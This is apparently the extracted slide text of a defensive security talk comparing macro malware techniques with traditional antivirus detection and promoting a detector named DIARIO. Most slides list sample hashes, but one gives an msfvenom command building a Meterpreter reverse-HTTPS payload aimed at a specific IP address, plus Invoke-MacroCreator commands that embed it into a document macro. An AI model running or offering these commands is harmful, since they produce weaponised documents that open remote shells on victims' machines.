
Common macro malware techniques vs. traditional detection models


A comparison between different macro malware techniques, how they work, and why DIARIO may help detecting them.


  3. Macro malware technique vs. traditional AV solutions. Techniques covered: Invoke-MacroCreator; Empire Framework; lab (homemade + Metasploit); macros calling other macros; ribbon controls.
  4. msfvenom -p windows/meterpreter/reverse_https LHOST=217.182.67.81 LPORT=443 -f raw
     Invoke-MacroCreator -i .shellcode_lab_ovh.raw -t shellcode -d body
     Invoke-MacroCreator -i .shellcode_lab_ovh.raw -t shellcode -d body -o 2
     Example: 070887239f8fa64bed91f3d32c63e3e65b0926f3465e4520639bf95204782252
  5. Example: aa8d62165e89e4bcedd39f594ec931ca0fdcbc0a90fa36502a63d41691350ab4
  6. Examples: 6157980bb2a8e3928bf73afe52c48654b52e5912ac5f91dccad2591416c261e4
  7. Example: 6d5eb6c7c492c5ef66b8b5484527a3639836c5cfe5f17d29cb62ff7671cafdcb
  8. Examples: 0a6dfdd9814e42e001ad382c0fa3e0370dbbc07fd6cfc8c2785230bd82ecef82
  9. Examples: 670b26ab5efe48be67bf93e40785c7996705ee7824bcdf06b58ab86b3d1a9384
  10. Examples: 234a420991649731cabf4b35e62c56915f040457240b37d5b39c5f24b12247ae
      Examples: 52ffd6df85eb36adc9f3a1337be4920eb28a340987535d98216260a8dc956458
      Application.Run "Book1.xls!MacroName"
  11. Examples: 1c5e874e14d23b670ed824a7dc5c9119af935c4e469a11c6c27ee92817def1ee
  12. Examples: e08709f5e69393fa76935fbba0d370ecfe432d359ff31f05187bd270bab589ce
  13. Examples: 469ba2d436c3348a3b2e3f8ce128e6386cb2e2c63cca1fe59068388eaa20f05c
